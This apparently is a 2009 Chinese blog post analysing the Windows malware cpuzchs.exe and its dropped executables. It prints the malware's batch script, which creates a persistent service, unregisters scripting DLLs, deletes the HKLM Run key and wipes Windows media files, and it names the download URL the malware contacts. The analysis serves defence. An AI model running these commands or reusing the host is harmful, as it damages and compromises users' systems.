摆渡人

生活是一艘船,需要我们去掌舵,摆渡人生,摆渡命运,摆渡智慧

« 头发少适合什么发型卖出股票的技巧 »

2009-3-15 4:12:58

cpuzchs.exe病毒专杀

主体:cpuzchs.exe

病毒由VC++6.0编写
三个区段,一个资源,该资源为一个可执行文件二进制数据。
开头,病毒创建了一个窗口,并循环接收消息,接到指定消息后进入窗口加载运行的代码,由于本人对MFC不熟悉,不知道指定消息是什么类型的,似乎是一个记时器信息……
代码藏在窗口创建代码中:

1,读取系统时间,计算随机码,取得系统文件夹(我这里是C:\windows)
2,在系统文件夹下创建一个随机码txt,并连接"http://lmok1234xing.w239.dns911.cn/kills.txt?p=095243quot;下载数据到C:\windows\XXXXX.txt。
3,释放随机名衍生物到C:\windows\下,并打开,删除之前下载的txt。(可能是更新的版本)
4,然后病毒退出。

释放体:0Z4607G5.exe(随机名)

病毒由VC++6.0编写
三个区段,一个资源,该资源为一个可执行文件二进制数据。
和前面的差不多。。。。
1,获取系统文件夹,释放文件"C:\Program Files\6C8VYVJMR.exe"(随机名)
2,运行"C:\Program Files\6C8VYVJMR.exe" 把自身路径作为启动命令行。
3,再次运行"C:\Program Files\6C8VYVJMR.exe" 启动参数为rb
4,延迟删除C:\Program Files\6C8VYVJMR.exe
5,创建随机名.bat到C:\Program Files\
6,把自身复制到"C:\Program Files\X3AZ33WQAI\E2QOSO9QA2Z.exe"(随机名)
7,把数据写到bat处,把字符全部拆成ACSII码
CP5OVYR6ZFCNA6KFDV1KKTZXFZ
sc.exe create GJRHLBinPath= "C:\Program Files\X3AZ33WQAI\E2QOSO9QA2Z.exe -start" type= own type= interact start= auto DisplayName= B9XJ9Q1K
072LGIGLF2T1
regsvr32.exe /u /s shimgvw.dll
QUI14HTZJHY81KN
regsvr32.exe /u /s itss.dll
DQ2VHP1PJIZ9WX6YL
regsvr32.exe /u /s scrrun.dll
OJ35AJMVAKHHV2L4
regsvr32.exe /u /s vbscript.dll
JCD4P4ZAF5XZK
regsvr32.exe /s jscript.dll
YXIIS77BLAECU895PCDYH
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Background_Sounds /t REG_SZ /d no /F
VFR1053W5UP4MA
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Animations /t REG_SZ /d no /F
WUGD807SO9SBBQO53
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Videos" /t REG_SZ /d no /F
YUWHL1N33ZXDCYA
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Images" /t REG_SZ /d yes /F
ZUVVJ8BRYCQVIBUD10U
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v DisablescriptDebuggerIE /t REG_SZ /d yes /F
LQT9LIMH7A3ZYMREJ
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Disable script Debugger" /t REG_SZ /d yes /F
GKZY8KE1IRHO5JA
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
BD6LV52HDDH4UOG9CZGE
del C:\WINDOWS\Media\*.* /Q
FSXEFJJNDO0NVT9UE
del %0
exit
95C47IRBH8H1XE
解释一下吧,创建一个系统服务,C:\Program Files\X3AZ33WQAI\E2QOSO9QA2Z.exe,为自动运行。
从进程中卸载shimgvw.dll,itss.dll,scrrun.dll,vbscript.dll,jscript.dll。。
应该是和IE加载项有关的模块,关闭IE的调试服务。把自身注册为服务,这个比较新鲜……

8,复制自身到"C:\WINDOWS\TBYA4FGQF1E1.exe"
把自身注册为系统服务

9,设置自身属性为:系统,隐藏,只读
 


原创文章如转载,请注明:转载自摆渡人 [ http://www.baidumen.com ]
本文链接地址:http://www.baidumen.com/baiduren/1268.html
分类:卡巴斯基

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新评论及回复

最近发表

Powered By 摆渡人 Code detection by Codefense

摆渡人-惊涛版权所有 冀ICP备05027985号